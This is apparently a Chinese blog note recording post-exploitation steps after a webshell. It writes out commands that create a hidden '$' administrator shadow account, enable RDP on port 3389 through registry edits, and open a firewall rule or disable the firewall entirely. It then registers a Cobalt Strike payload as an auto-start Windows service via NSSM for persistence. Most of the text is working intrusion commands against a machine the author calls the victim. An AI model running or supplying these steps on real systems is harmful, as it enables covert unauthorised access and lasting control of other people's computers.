就在刚刚我成功的通过webshell跳到了远程桌面
下面记录一下拿下的过程
参考以下链接即可
添加用户(「渗透技巧」添加 administrator 影子用户-CSDN博客)[https://blog.csdn.net/Javachichi/article/details/129280873]
开启远程桌面端口(单独记录内网渗透时如何使用命令行允许远程访问+开启3389端口,并进行哈希传递进行远程桌面连接 - BattleofZhongDinghe - 博客园 (cnblogs.com))[https://blog.csdn.net/Javachichi/article/details/129280873]
添加用户:
net user username$ Passwd123 /add #添加一个普通用户
($符添加时 , 只是在 net user 中无法查看到当前用户 ,而在 net localgroup administrators 中是可以看到的)
net localgroup administrators username$ /add #添加到管理员组
net user && net localgroup administrators #用于查询有什么用户的命令
添加远程桌面端口:
1.受害机执行允许远程访问的命令
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
2.受害机开启3389端口
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 3389 /f
net stop TermService
net start TermService
防火墙相关设置
以下二选一
1)防火墙开启3389端口(首选)
netsh advfirewall firewall add rule name="Allow Remote Desktop" dir=in action=allow protocol=TCP localport=3389
2)直接关掉防火墙
netsh advfirewall set allprofiles state off
3.查看3389是否开启
netstat -ano | findstr 3389
更多请见开头列出的两篇博客,这里只列出我试验过的命令
使用服务将cobaltstrike持久化:
要将批处理文件(.bat 文件)注册为服务并在 Windows 开机时自启动,你可以结合使用 NSSM(Non-Sucking Service Manager) 工具来实现。以下是详细步骤:
- 下载和安装 NSSM:
o 访问 NSSM 官方网站 下载最新版本的 NSSM 工具。
o 解压缩并将 nssm.exe 放置在一个方便访问的路径(例如 C:\nssm)。 - 打开命令提示符:
o 以管理员身份运行命令提示符(或 PowerShell)。 - 使用 NSSM 创建服务:
o 在命令提示符中,使用以下命令来创建服务。假设你的批处理文件路径为 C:\path\to\your\script.bat,并为服务取名为 YourServiceName:
o nssm install YourServiceName "C:\path\to\your\script.bat" 1 - 配置 NSSM 设置:
o 使用以下命令编辑服务的设置:
o nssm edit YourServiceName
o 在 NSSM 窗口的“Details”选项卡中,将服务的启动类型设置为“自动(Automatic)”,以确保服务在系统启动时自动启动。 - 验证服务是否自启动:
o 重新启动计算机,查看服务管理器中的服务是否已经自动启动,并确保你的批处理文件按预期运行。